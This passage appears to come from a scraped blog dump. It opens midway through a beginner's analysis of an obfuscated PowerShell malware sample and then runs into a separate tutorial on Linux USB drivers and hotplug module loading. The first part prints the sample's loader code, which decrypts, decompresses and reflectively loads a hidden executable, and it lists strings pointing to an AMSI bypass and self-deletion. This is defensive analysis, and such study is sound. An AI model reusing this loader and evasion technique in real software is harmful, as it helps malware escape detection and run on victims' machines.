$decryptObj.TransformFinalBlock($decoded_comment_line, 0, $decoded_comment_line.Length); $decryptObj.Dispose(); $cryptObj.Dispose(); ## Shuffle the data throught memory streams and decompress it (gzip decompression) $decrypted_stream = New-Object System.IO.MemoryStream(, $decrypted_comment_line); $extra_stream = New-Object System.IO.MemoryStream; $ungzip_decrypted_stream = New-Object System.IO.Compression.GZipStream($decrypted_stream, [IO.Compression.CompressionMode]::Decompress); $ungzip_decrypted_stream.CopyTo($extra_stream); $ungzip_decrypted_stream.Dispose(); $decrypted_stream.Dispose(); $extra_stream.Dispose(); ## Load the final binary and execute it $asm = [System.Reflection.Assembly]::(\u0026#39;daoL\u0026#39;[-1..-4] -join \u0026#39;\u0026#39;)($decrypted_array); $asm_entrypoint = $asm.EntryPoint; $asm_entrypoint.Invoke($null, (, [string[]] (\u0026#39;%*\u0026#39;))) There are tons of obfuscation techniques that can be used by a hacker or a professional, but the final goal is common - To make it harder to read and interpret. Here is a blog by Offensive-Security on powershell obfuscation 2 that helped me to gain knowledge about how powershell malwares are usually obfuscated.\nThis malware specifically used some good techniques:-\nchanging the variable names to random characters String reversal techniques for powershell commands. Key based cryptography to encrypt the malicious payload. Compressing the payload to prevent detection Decompressing in memory streams to make it somewhat fileless and hard to detect. \u0026hellip;but the method employed to hide the payload in comments actually astounded me.\nWindows EXE file There were several steps within a single line powershell command, that were eventually loading and executing the actual malware. 
Instead of writing my own functions to reverse engineer everything the author has done, I took the lazy approach and let his code do most of the work\u0026hellip;and just before the loading \u0026amp; execution segment, I dumped the binary. 🤭\n## Dump exe file before loading and executing $result = [System.Text.Encoding]::UTF8.GetString($extra_stream.ToArray()) $result \u0026gt; extra_stream.exe.txt How I know it is an EXE file? \u0026hellip;Simply by looking at the magic numbers of the obtained file\nAll the obfuscation, just to make sure that this exe file gets executed. 🤦 Well, now it\u0026rsquo;s time to analyze the binary file we just extracted and see if we can figure out the truth about this EXE-to-pdf program. For this, I quickly launched up radare2 3 in another terminal and started analysing the file. Why Radare2?? I prefer stayting in the terminal\u0026hellip;And it is an amazing tool :)\nWhat does all Reverse Engineering 101 books say?? - grab some basic info about the binary file and dump all strings to support the existing hypothesis and build on it.\nSo I did that..\nBasic info\nfile extra_stream.exe.txt size 0x409f humansz 16.2K minopsz 1 maxopsz 16 invopsz 1 mode r-x format any iorw false block 0x100 Strings (omitted)\n211 0x0000271a 0x0000271a 20 21 ascii BJEtuQtQCkWlpTOkRPdJ 212 0x0000272f 0x0000272f 20 21 ascii OzLDUBlAcSBIOPOJLBlh 213 0x00002744 0x00002744 20 21 ascii BDltEFgkoicgcKNaARhF 214 0x00002759 0x00002759 20 21 ascii QvYrospzbuUnUAXNVABe 215 0x0000276e 0x0000276e 20 21 ascii joIOHkxVlAiZHoYgFUel 316 0x00002ce8 0x00002ce8 14 15 ascii RuntimeHelpers 317 0x00002cf7 0x00002cf7 5 6 ascii Array 318 0x00002cfd 0x00002cfd 18 19 ascii RuntimeFieldHandle 319 0x00002d10 0x00002d10 15 16 ascii InitializeArray 320 0x00002d20 0x00002d20 19 20 ascii $$method0x6000003-2 321 0x00002d34 0x00002d34 7 8 ascii UIntPtr 322 0x00002d3c 0x00002d3c 11 12 ascii op_Explicit 323 0x00002d48 0x00002d48 4 5 ascii Copy 324 0x00002d4d 0x00002d4d 17 18 ascii 
System.Reflection 325 0x00002d5f 0x00002d5f 8 9 ascii Assembly 326 0x00002d68 0x00002d68 20 21 ascii GetExecutingAssembly 327 0x00002d7d 0x00002d7d 24 25 ascii GetManifestResourceNames 328 0x00002d96 0x00002d96 13 14 ascii WriteAllBytes 329 0x00002da4 0x00002da4 16 17 ascii System.Threading 330 0x00002db5 0x00002db5 11 12 ascii ThreadStart 331 0x00002dc1 0x00002dc1 6 7 ascii Thread 332 0x00002dc8 0x00002dc8 4 5 ascii Char 333 0x00002dcd 0x00002dcd 5 6 ascii Split 334 0x00002dd3 0x00002dd3 4 5 ascii Load 335 0x00002dd8 0x00002dd8 10 11 ascii MethodInfo 336 0x00002de3 0x00002de3 14 15 ascii get_EntryPoint 337 0x00002df2 0x00002df2 10 11 ascii MethodBase 338 0x00002dfd 0x00002dfd 16 17 ascii ProcessStartInfo 339 0x00002e0e 0x00002e0e 6 7 ascii Concat 340 0x00002e15 0x00002e15 13 14 ascii set_Arguments 341 0x00002e23 0x00002e23 18 19 ascii ProcessWindowStyle 342 0x00002e36 0x00002e36 15 16 ascii set_WindowStyle 343 0x00002e46 0x00002e46 18 19 ascii set_CreateNoWindow 344 0x00002e59 0x00002e59 12 13 ascii set_FileName 345 0x00002e66 0x00002e66 11 12 ascii System.Core 346 0x00002e72 0x00002e72 28 29 ascii System.Security.Cryptography 347 0x00002e8f 0x00002e8f 10 11 ascii AesManaged 348 0x00002e9a 0x00002e9a 18 19 ascii SymmetricAlgorithm 349 0x00002ead 0x00002ead 10 11 ascii CipherMode 350 0x00002eb8 0x00002eb8 8 9 ascii set_Mode 351 0x00002ec1 0x00002ec1 11 12 ascii PaddingMode 352 0x00002ecd 0x00002ecd 11 12 ascii set_Padding 353 0x00002ed9 0x00002ed9 16 17 ascii ICryptoTransform 354 0x00002eea 0x00002eea 15 16 ascii CreateDecryptor 355 0x00002efa 0x00002efa 19 20 ascii TransformFinalBlock 356 0x00002f0e 0x00002f0e 12 13 ascii MemoryStream 357 0x00002f1b 0x00002f1b 21 22 ascii System.IO.Compression 358 0x00002f31 0x00002f31 10 11 ascii GZipStream 359 0x00002f3c 0x00002f3c 6 7 ascii Stream 360 0x00002f43 0x00002f43 15 16 ascii CompressionMode 361 0x00002f53 0x00002f53 6 7 ascii CopyTo 362 0x00002f5a 0x00002f5a 7 8 ascii ToArray 363 0x00002f62 0x00002f62 25 26 ascii 
GetManifestResourceStream 364 0x00002f7c 0x00002f7c 11 12 ascii payload.exe 365 0x00002f8a 0x00002f8a 34 69 utf16le Select * from Win32_ComputerSystem 373 0x00003070 0x00003070 44 89 utf16le Ok++WI0tak7DdF3uV9x+8O7wJaTIlfxMVTMno9KXut4= 374 0x000030ca 0x000030ca 44 90 utf16le +uLTyyminmCZeXdFSCeWyXEOtzicLz4HHy5dikdWUWc= 375 0x00003124 0x00003124 24 49 utf16le WTltvoM17r/Ehimm8ynucg== 376 0x00003156 0x00003156 44 89 utf16le amZLVSQJiUQKj6Rv/kTQ8kyn+kGd0mUv6VK0wS/w3/E= 377 0x000031b0 0x000031b0 14 29 utf16le VirtualProtect 378 0x000031ce 0x000031ce 8 18 utf16le amsi.dll 379 0x000031e0 0x000031e0 24 49 utf16le WG/Dged0cIrjNUQv5M9ONw== 380 0x00003212 0x00003212 9 20 utf16le ntdll.dll 381 0x00003226 0x00003226 24 50 utf16le KMgwS70BP93VTwRv09KJTQ== 382 0x00003258 0x00003258 24 50 utf16le ZoHIhlSGD8rN6cc5D8M/MA== 383 0x0000328a 0x0000328a 24 49 utf16le shwnMnkYp+bePn1r9fIgQg== 384 0x000032c3 0x000032c3 63 127 utf16le MNbxejM5jxzm3r5TKG6sPhlK6QF/D8w6/aOC8lz9bfMr26dy72cAJCSoDcBoN3Q 385 0x00003343 0x00003343 9 19 utf16le \u0026#34; \u0026amp; del \u0026#34; 386 0x0000335b 0x0000335b 7 16 utf16le cmd.exe There are base64 encoded strings, interesting function calls and interesting strings in this binary, which I can look up and figure out what this file does. It will be so easy!!\nBut to my surprise, it was not at all easy\u0026hellip; Or maybe I\u0026rsquo;m just not worthy yet.\nAll the base64 strings are not readable. 
Although I\u0026rsquo;ve a feeling that these strings are used in similar fashion as they were used in previous powershell payload.\nEven after looking in the memory area where the intriguing strings are pointed, I was unable to find anything that made sense to me.\n[0x00002f70]\u0026gt; pd 20 ; CODE XREF from fcn.00000000 @ +0x2f01 0x00002f70 6f outsd dx, dword [rsi] ┌─\u0026lt; 0x00002f71 7572 jne 0x2fe5 │ 0x00002f73 636553 movsxd rsp, dword [rbp + 0x53] ┌──\u0026lt; 0x00002f76 7472 je 0x2fea ││ 0x00002f78 65 invalid ││ 0x00002f79 61 invalid ││ 0x00002f7a 6d insd dword [rdi], dx ││ 0x00002f7b 007061 add byte [rax + 0x61], dh ┌───\u0026lt; 0x00002f7e 796c jns 0x2fec │││ 0x00002f80 6f outsd dx, dword [rsi] │││ 0x00002f81 61 invalid ┌────\u0026lt; 0x00002f82 642e657865 js 0x2fec ││││ 0x00002f87 0000 add byte [rax], al ││││ ; CODE XREFS from fcn.00000000 @ +0x2f15, +0x2f34 ││││ 0x00002f89 4553 push r11 ││││ 0x00002f8b 006500 add byte [rbp], ah ││││ 0x00002f8e 6c insb byte [rdi], dx ││││ 0x00002f8f 006500 add byte [rbp], ah ││││ 0x00002f92 6300 movsxd rax, dword [rax] ┌─────\u0026lt; 0x00002f94 7400 je 0x2f96 │││││ ; CODE XREF from fcn.00000000 @ +0x2f94 └─────\u0026gt; 0x00002f96 2000 and byte [rax], al Then I looked at the color patterns to figure out if it had repeated patterns\u0026hellip; I could then take it as a sign that this binary is itself encoded.\nNext Steps? There are numerous indicators right now that point to the possibility that this is malware, but who am I to judge? (based on what I currently understand about Windows malware analysis)\nFor now, I just have a few leads to pursue, but maybe in the future I\u0026rsquo;ll figure it all the way down and find out exactly what this program does. 
Till then\u0026hellip;\nhttps://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.offensive-security.com/offsec/powershell-obfuscation/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://rada.re/n/radare2.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/08/analyzing-simple-powershell-malware/","summary":"What is a malware? Malware, a portmanteau of malicious software, refers to any program that was created with the specific goal of doing harm. Your digital environment is vulnerable to a variety of terrible things, including attempts to compromise your computer or network, leak confidential data, and gain illegal access. These issues can occasionally be brought on by common software defects, but when malware is to blame, it poses a major risk to online users and businesses.","title":"Analyzing Simple Powershell Malware"},{"content":"This is Task 05 of the Eudyptula Challenge ------------------------------------------ Yeah, you survived the coding style mess! Now, on to some \u0026#34;real\u0026#34; things, as I know you are getting bored by these so far. So, simple task this time around: - take the kernel module you wrote for task 01, and modify it so that when a USB keyboard is plugged in, the module will be automatically loaded by the correct userspace hotplug tools (which are implemented by depmod / kmod / udev / mdev / systemd, depending on what distro you are using.) Yes, so simple, and yet, it\u0026#39;s a bit tricky. As a hint, go read chapter 14 of the book, \u0026#34;Linux Device Drivers, 3rd edition.\u0026#34; Don\u0026#39;t worry, it\u0026#39;s free, and online, no need to go buy anything. What is USB?? Of course, we know what a USB is!! 
We use it every day with our digital devices like pen-drives, external hard disks, chargers, digital cameras, keyboards, mice, wifi dongles, etc\u0026hellip; USB devices and connectors are popular with everyone, even with people without any IT background. It is so famous and well known that it has got its own website 1 and a Wikipedia page 2.\nIn the early days, just before USB appeared, peripherals like keyboards, mice and printers were connected through serial and parallel ports. The problem with that was that if you accidentally stuck a mouse into the socket for the keyboard, it wouldn\u0026rsquo;t work. And that\u0026rsquo;s not all: once you had successfully connected the device to the correct socket, you still needed to install the proper driver for it.\nIf all went well, a quick reboot after the driver install and you\u0026rsquo;d have your working device ready to be used. Naturally, people wanted something better and easier than this - \u0026ldquo;One port to rule them all\u0026rdquo;\nAnd soon, the USB (Universal Serial Bus) was born as a replacement for the serial, parallel and PS/2 ports.\nThe USB specification went on to have several revisions, with the major ones being 2.0 in 2000, 3.0 in 2008, and the very latest spec (4.0) released in 2019. Let\u0026rsquo;s take a look at how USBs work.\nUSB in linux The Linux kernel has a dedicated sub-system to handle USB; you can read everything about it in detail here 3\nLet me start with a terminal command to begin explaining things. 
There are utilities that can help you identify the system hardware\u0026hellip; you can find any device connected to your system, and more specifically you can list the attached USB devices with the lsusb command\n# COMMAND -\u0026gt; lsusb --tree --verbose /: Bus 01.Port 1: Dev 1, Class=root_hub, Driver=xhci_hcd/6p, 5000M ID PP01:VV02 Linux Foundation 3.0 root hub /: Bus 02.Port 1: Dev 1, Class=root_hub, Driver=xhci_hcd/12p, 480M ID PP01:VV01 Linux Foundation 2.0 root hub |__ Port 1: Dev 2, If 1, Class=Human Interface Device, Driver=usbhid, 12M ID 046d:c534 Logitech, Inc. Unifying Receiver |__ Port 1: Dev 2, If 0, Class=Human Interface Device, Driver=usbhid, 12M ID 046d:c534 Logitech, Inc. Unifying Receiver |__ Port 5: Dev 3, If 1, Class=Wireless, Driver=btusb, 12M ID PP03:VV03 Lite-On Technology Corp. Qualcomm Atheros QCA9377 Bluetooth |__ Port 5: Dev 3, If 0, Class=Wireless, Driver=btusb, 12M ID PP03:VV03 Lite-On Technology Corp. Qualcomm Atheros QCA9377 Bluetooth |__ Port 7: Dev 4, If 0, Class=Video, Driver=uvcvideo, 480M ID PP04:VV04 Realtek Semiconductor Corp. |__ Port 7: Dev 4, If 1, Class=Video, Driver=uvcvideo, 480M ID PP04:VV04 Realtek Semiconductor Corp. This output shows a list of USB host controllers (Bus 02 and Bus 01) and the actual physical devices connected to them. At the end of each entry\u0026rsquo;s first line, the negotiated speed is shown in Mbits/s. Different kinds of devices negotiate different speeds.\nFull speed mode (12 Mbits/s) is used for communicating with keyboards, mice and other similar devices. Hi-Speed mode (480 Mbits/s) is used for communication with storage devices, webcams, and other devices which demand more bandwidth. A port running at 5000 Mbits/s (5 Gbits/s) is a USB 3.0 port. As the output shows, my laptop has two USB host controllers. One of them is USB3 (5000 Mbits/s) and the other is USB2 (480 Mbits/s). 
Both of them are managed by the xhci_hcd driver; the /6p and /12p suffixes give the number of ports on each root hub.\nThe device numbers (Dev 1, Dev 2, \u0026hellip;) are just numbers given by the kernel to identify each device. If you unplug and replug the same USB device, you might get another device number for it.\nNow, let\u0026rsquo;s focus on bus #02. This bus has 3 classes of devices connected to it:-\nHuman Interface Device (for my keyboard and mouse) Wireless (for Bluetooth adapter card) Video (for video camera) Each USB device contains a vendor ID and a product ID, which help programs detect the device and load the proper driver for it. To clarify, companies pay to acquire Vendor IDs from the USB Implementers Forum. A complete list of vendor IDs with their respective product IDs can be found here 4\nUSB implementation is complex by design. There are tons of things that are abstracted away from regular users\u0026hellip; but for a kernel developer working on USB device drivers, it is very useful to know how things work beyond the simple abstraction layer.\nMore USB info There is some information that lsusb does not show, to keep things easy for the end user\u0026hellip; We can use the usb-devices command for that stuff.\nT: Bus=01 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=480 MxCh=12 D: Ver= 2.00 Cls=09(hub ) Sub=00 Prot=01 MxPS=64 #Cfgs= 1 P: Vendor=1d6b ProdID=0002 Rev=05.18 S: Manufacturer=Linux 5.18.3-arch1-1 xhci-hcd S: Product=xHCI Host Controller S: SerialNumber=0000:00:14.0 C: #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr=0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 4 Ivl=256ms T: Bus=01 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 5 Spd=12 MxCh= 0 D: Ver= 2.00 Cls=00(\u0026gt;ifc ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=046d ProdID=c534 Rev=29.01 S: Manufacturer=Logitech S: Product=USB Receiver C: #Ifs= 2 Cfg#= 1 Atr=a0 MxPwr=98mA I: If#= 0 Alt= 0 #EPs= 1 Cls=03(HID ) Sub=01 Prot=01 Driver=usbhid E: Ad=81(I) Atr=03(Int.) 
MxPS= 8 Ivl=8ms I: If#= 1 Alt= 0 #EPs= 1 Cls=03(HID ) Sub=01 Prot=02 Driver=usbhid E: Ad=82(I) Atr=03(Int.) MxPS= 20 Ivl=2ms T: Bus=02 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=5000 MxCh= 6 D: Ver= 3.00 Cls=09(hub ) Sub=00 Prot=03 MxPS= 9 #Cfgs= 1 P: Vendor=1d6b ProdID=0003 Rev=05.18 S: Manufacturer=Linux 5.18.3-arch1-1 xhci-hcd S: Product=xHCI Host Controller S: SerialNumber=0000:00:14.0 C: #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr=0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 4 Ivl=256ms This definitely gives more information than the previous command\u0026hellip; but it all looks alien at first glance. Slowly, you can see that a few bits are not so alien after all. We can get the Bus, Port, Spd (Speed), Cls, Vendor and ProdID from the above output, just as we could with the lsusb command.\nNow it\u0026rsquo;s time to understand more about USBs, get past the abstraction layer and dig deeper.\nTypically, USB devices get their own file-system on linux, a dynamically generated file-system that complements the normal device node system and can be used to write user space device drivers. Just remember that this is not always the case.\nIrrespective of what the case is, you can get the above output (or something similar) using a multitude of tools/utilities\u0026hellip; you can just focus on understanding the output of such tools/utilities for now.\nThe information in the above output is arranged in groups, and each line starts with one character that indicates the type of information written on that specific line. 
See the table below for the complete list:\nCharacter: Meaning\nT: Topology information\nD: Device Descriptor information\nP: Similar to D; Product info (fetched from device descriptor info)\nS: String info; returned by device\nC: Configuration Descriptor information\nI: Interface Descriptor information\nE: Endpoint Descriptor information\nTo get a complete understanding of the above, we need more knowledge about how the USB system works inside the linux kernel\u0026hellip; Or more specifically, how USB endpoints, interfaces and configurations all fit together in the topology.\nAccording to the USB protocol (standardized by the USB Implementers Forum or USB-IF folks), USB is a cable bus that supports data exchange between a host computer and a wide range of simultaneously accessible peripherals.\nThe USB protocol uses a star topology starting from a single node called \u0026ldquo;host\u0026rdquo; or \u0026ldquo;root-hub\u0026rdquo; with branches to other nodes. These nodes could be another level of hub or simply a functional peripheral device (a device used by the user).\nBecause of this topology, a USB device can never start sending data without being asked first\u0026hellip; So it puts the USB host controller in charge of asking every USB device if it has any data to send. This allows for a very easy plug-n-play type of system, where devices can be easily configured by the host computer.\nTo remove the necessity of special drivers for different kinds of devices, the USB protocol specification defines a set of standards that any device of a specific type can follow. These types are called classes. The complete list of USB specified classes, with their class codes, can be found here 5.\nThe idea of installing drivers for each and every USB device (manually) and then rebooting the system is very scary to me. This type of specification helps a lot. Still, if there are some special devices which you need to work with, then you can install the special device driver for them and it\u0026rsquo;ll still work. 
It means you get support for most kinds of USB devices by default, and you can still add more support without changing anything in the design.\nUnfortunately, the USB protocol specification is a multi-layer protocol specification, which makes USB a lot more complex and abstracted than we expected. Fortunately, most of this complexity is handled by the USB core subsystem 6.\nLinux device drivers (normally implemented as loadable kernel modules) have to set up a few things before they can actually start working with USB devices. A few of these things involve setting up configurations, interfaces and endpoints, and then binding the USB driver to a USB interface.\nEndpoints The most basic form of USB communication is through endpoints. Endpoints are like pipes which carry data in a single direction only (a unidirectional pipe), either from my laptop to the device (OUT endpoint) or from the USB device to my laptop (IN endpoint).\nEach endpoint has an associated transfer type which defines how the data is transmitted through that endpoint. There are 4 different types:-\nCONTROL\nNormally used to configure, retrieve info, send info or get status reports about the device. Every USB device has a control endpoint with associated number = 0 INTERRUPT\nTransfers small amounts of data at a fixed rate every time somebody asks the device for data. Usually used with keyboards and mice; anywhere we need to send a signal to the device using buttons or similar methods. BULK\nTransfers larger amounts of data with no data loss. Common for printer, storage and network devices. ISOCHRONOUS\nAlso transfers large amounts of data, but data loss is possible. Usually for real time devices or any constant streaming data. Commonly found in audio and video devices. 
In the linux kernel, this is implemented using struct usb_host_endpoint 7\nstruct usb_host_endpoint { struct usb_endpoint_descriptor\tdesc; struct usb_ss_ep_comp_descriptor\tss_ep_comp; struct usb_ssp_isoc_ep_comp_descriptor\tssp_isoc_ep_comp; struct list_head\turb_list; void\t*hcpriv; struct ep_device\t*ep_dev;\t/* For sysfs info */ unsigned char *extra; /* Extra descriptors */ int extralen; int enabled; int streams; }; Each endpoint has its own descriptor attached to it, which is defined with struct usb_endpoint_descriptor 8 . This structure contains the actual information provided by the device.\n/* USB_DT_ENDPOINT: Endpoint descriptor */ struct usb_endpoint_descriptor { __u8 bLength; __u8 bDescriptorType; __u8 bEndpointAddress; __u8 bmAttributes; __le16 wMaxPacketSize; __u8 bInterval; /* NOTE: these two are _only_ in audio endpoints. */ /* use USB_DT_ENDPOINT*_SIZE in bLength, not sizeof. */ __u8 bRefresh; __u8 bSynchAddress; } __attribute__ ((packed)); We can already see the bmAttributes and bEndpointAddress fields in struct usb_endpoint_descriptor. bmAttributes is what defines the type of the endpoint - either Control, Interrupt, Bulk or Isochronous. bEndpointAddress holds the endpoint number and also the direction of the endpoint - either IN or OUT. The bit-masks USB_DIR_OUT and USB_DIR_IN can be placed against this field to determine the direction of the endpoint. (bDescriptorType only says which kind of descriptor this is; here, USB_DT_ENDPOINT.)\nInterfaces Zero or more such endpoints are bundled up into an Interface. Each interface handles only one type of USB connection - such as mouse, touch-pad, keyboard, storage, video stream, etc. USB interfaces may have alternate settings, which are different choices for parameters of the interface. 
In kernel, this is implemented as struct usb_interface 9 .\nstruct usb_interface { /* array of alternate settings for this interface, * stored in no particular order */ struct usb_host_interface *altsetting; struct usb_host_interface *cur_altsetting;\t/* the currently * active alternate setting */ unsigned num_altsetting;\t/* number of alternate settings */ int minor;\t/* minor number this interface is * bound to */ ... snip snip ... }; struct usb_interface is the structure which USB core passes to USB drivers and what the USB driver is then in charge of. Each usb_interface can have multiple settings, but only one setting will be used at a point in time. These settings are defined in another struct struct usb_host_interface. 10\nstruct usb_host_interface { struct usb_interface_descriptor\tdesc; int extralen; unsigned char *extra; /* Extra descriptors */ /* array of desc.bNumEndpoints endpoints associated with this * interface setting. these will be in no particular order. */ struct usb_host_endpoint *endpoint; char *string;\t/* iInterface string, if present */ }; struct usb_host_interface contains a struct usb_host_endpoint which is the USB endpoint structure we discussed above.\nConfigurations One or more USB interfaces are themselves bundled in a USB configuration. A USB device can have multiple configurations and might switch between them in order to change the state of the device.\nIn linux kernel, It is defined as struct usb_host_config 11 .\nstruct usb_host_config { struct usb_config_descriptor\tdesc; char *string;\t/* iConfiguration string, if present */ /* List of any Interface Association Descriptors in this * configuration. 
*/ struct usb_interface_assoc_descriptor *intf_assoc[USB_MAXIADS]; /* the interfaces associated with this configuration, * stored in no particular order */ struct usb_interface *interface[USB_MAXINTERFACES]; /* Interface information available even when this is not the * active configuration */ struct usb_interface_cache *intf_cache[USB_MAXINTERFACES]; unsigned char *extra; /* Extra descriptors */ int extralen; }; Linux represents a USB configuration with the struct usb_host_config shown above and the entire USB device with struct usb_device 12\n[Diagram: relationship layout of endpoints, interfaces and configurations within a device. A Device box contains CONFIG 1 and CONFIG 2; each configuration contains Interface 1, Interface 2 and Interface 3; each interface contains two ENDPOINT boxes.]\nSo to summarize,\nDevices usually have 1 or more configurations. Configs have 1 or more interfaces. Interfaces have 1 or more settings. Interfaces have 0 or more endpoints. Understanding output of usb-devices Looking back at the output of the usb-devices command with this newly gained knowledge, we can now understand a few more things from it.\n# COMMAND --\u0026gt; usb-devices T: Bus=01 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=480 MxCh=12 D: Ver= 2.00 Cls=09(hub ) Sub=00 Prot=01 MxPS=64 #Cfgs= 1 P: Vendor=1d6b ProdID=0002 Rev=05.18 S: Manufacturer=Linux 5.18.3-arch1-1 xhci-hcd S: Product=xHCI Host Controller S: SerialNumber=0000:00:14.0 C: #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr=0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) 
MxPS= 4 Ivl=256ms T: Bus=01 Lev=01 Prnt=01 Port=00 Cnt=01 Dev#= 5 Spd=12 MxCh= 0 D: Ver= 2.00 Cls=00(\u0026gt;ifc ) Sub=00 Prot=00 MxPS= 8 #Cfgs= 1 P: Vendor=046d ProdID=c534 Rev=29.01 S: Manufacturer=Logitech S: Product=USB Receiver C: #Ifs= 2 Cfg#= 1 Atr=a0 MxPwr=98mA I: If#= 0 Alt= 0 #EPs= 1 Cls=03(HID ) Sub=01 Prot=01 Driver=usbhid E: Ad=81(I) Atr=03(Int.) MxPS= 8 Ivl=8ms I: If#= 1 Alt= 0 #EPs= 1 Cls=03(HID ) Sub=01 Prot=02 Driver=usbhid E: Ad=82(I) Atr=03(Int.) MxPS= 20 Ivl=2ms T: Bus=02 Lev=00 Prnt=00 Port=00 Cnt=00 Dev#= 1 Spd=5000 MxCh= 6 D: Ver= 3.00 Cls=09(hub ) Sub=00 Prot=03 MxPS= 9 #Cfgs= 1 P: Vendor=1d6b ProdID=0003 Rev=05.18 S: Manufacturer=Linux 5.18.3-arch1-1 xhci-hcd S: Product=xHCI Host Controller S: SerialNumber=0000:00:14.0 C: #Ifs= 1 Cfg#= 1 Atr=e0 MxPwr=0mA I: If#= 0 Alt= 0 #EPs= 1 Cls=09(hub ) Sub=00 Prot=00 Driver=hub E: Ad=81(I) Atr=03(Int.) MxPS= 4 Ivl=256ms We already know that the output is grouped and what these characters at the most-left side mean. We now just need to map what rest of the things mean and how they relate to all what we have just learned.\nSo the first line in each group starts with T, which indicates the information in that line is related to topology of the device. Bus indicates what physical bus that device is connected to. Lev indicates the level of the node in the complete topology of that bus. Level 00 means it is the root hub. Next, level 01 will be any device connected to the main root hub (00) and all the devices connected to 01 hubs will be treated as level 02 devices and so on. Spd indicates the negotiated speed of that node. MxCh indicates how many devices can be connected to this device, and is 00 for anything except a hub.\nNext line, starting with D, this shows the device information like Ver for USB version (mostly, 2 or 3 for now), Cls (class) of the device node. If this is marked as 00, then the interface should be read for the device class information. Sub indicates the sub-class of the node. 
#Cfgs indicates how many configurations this device has.\nThe next lines, starting with P and S, carry the vendor ID, product ID and revision (P) and the manufacturer, product and serial-number strings (S). This is useful information if we want to write a driver for specific kinds of devices.\nThen the remaining lines, starting with C, I and E, are the Configuration info, Interface info and the Endpoint info respectively. #Ifs is the number of interfaces in that configuration. Cfg# is the number of this configuration (the total count of configurations is #Cfgs on the D line). Atr stores a hexadecimal value to indicate if the device is bus-powered(0x80), self-powered(0x40) or remote wake-up capable(0x20). #EPs is the number of endpoints in this alternate setting of the interface.\nUSB driver - code walk-through At this point, we roughly know what USB is comprised of and how it works inside the Linux kernel. Let\u0026rsquo;s dig into the code.\n// SPDX-License-Identifier: GPL-2.0+ #include \u0026lt;linux/usb.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; #include \u0026lt;linux/hid.h\u0026gt; static int hello_connect(struct usb_interface *interface, const struct usb_device_id *id) { pr_alert(\u0026#34;USB plugged in.\\n\u0026#34;); return 0; } static void hello_disconnect(struct usb_interface *interface) { pr_alert(\u0026#34;USB disconnected.\\n\u0026#34;); } static const struct usb_device_id id_table[] = { { USB_INTERFACE_INFO( USB_INTERFACE_CLASS_HID, USB_INTERFACE_SUBCLASS_BOOT, USB_INTERFACE_PROTOCOL_KEYBOARD ) }, { USB_DEVICE( 0x058f, // Vendor Id 0x6387 // Product Id ) }, {}, // End node - always null }; MODULE_DEVICE_TABLE(usb, id_table); static struct usb_driver driver = { .name = \u0026#34;ayedaemonUSB\u0026#34;, .probe = hello_connect, .disconnect = hello_disconnect, .id_table = id_table, }; static int __init hello_usb(void) { pr_debug(\u0026#34;Hello from ayedaemonUSB.\\n\u0026#34;); return usb_register(\u0026amp;driver); } static void __exit bye_usb(void) { pr_debug(\u0026#34;Bye from ayedaemonUSB.\\n\u0026#34;); 
usb_deregister(\u0026amp;driver); } module_init(hello_usb); module_exit(bye_usb); MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Eudyptula task5\u0026#34;); You should be familiar with majority of the above code. This is how a simple linux module is written.\nFirst line is always the SPDX license. Read more here Then some imports from other available header files. init (hello_usb) and exit (bye_usb) as entry and exit functions for the module. Macro calls for registering and unregistering both init and exit functions. Along with some module metadata macro calls. Apart from this, we have some more code segment, which we are going to talk about in brief. At first, We need to create a struct usb_driver so that it can hold our driver information and the id_table. This id_table is very important for all the USB device drivers, as this list tells about the devices this driver can support. There are many macros that can help to define elements for this list. Each element is struct usb_device_id 13, and all the macros help to create this struct using only few values such as device class, product and vendor ids, etc.\nstruct usb_device_id { /* which fields to match against? */ __u16\tmatch_flags; /* Used for product specific matches; range is inclusive */ __u16\tidVendor; __u16\tidProduct; __u16\tbcdDevice_lo; __u16\tbcdDevice_hi; /* Used for device class matches */ __u8\tbDeviceClass; __u8\tbDeviceSubClass; __u8\tbDeviceProtocol; /* Used for interface class matches */ __u8\tbInterfaceClass; __u8\tbInterfaceSubClass; __u8\tbInterfaceProtocol; /* Used for vendor-specific interface matches */ __u8\tbInterfaceNumber; /* not matched against */ kernel_ulong_t\tdriver_info __attribute__((aligned(sizeof(kernel_ulong_t)))); }; So when we load this module into a running kernel:-\nthe hello_usb function will be executed and this in-turn will execute the usb_register function. 
The usb_register function registers the driver we described with struct usb_driver. This usb_driver needs a few fields, like the name of the driver and the functions USB core calls when a supported device is bound to the driver (probe) or taken away from it (disconnect). When a USB device supported by this driver is plugged in, the user-space hot-plug tools load the module automatically and USB core calls probe. Along with other fields, usb_driver also contains a field that stores a list of all the devices this driver supports. This is used by USB core to know when to bind this driver with the usb device. MODULE_DEVICE_TABLE is the macro that exports the id_table to user space as module aliases, so that depmod and the hot-plug tools know which devices this module supports. Final steps Now, all we need is a Makefile to make everything a bit automated and we are good to compile and load our USB module into the running kernel.\nCFLAGS_HelloWorld.o = -DDEBUG obj-m += HelloWorld.o KDIR ?= /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) default: 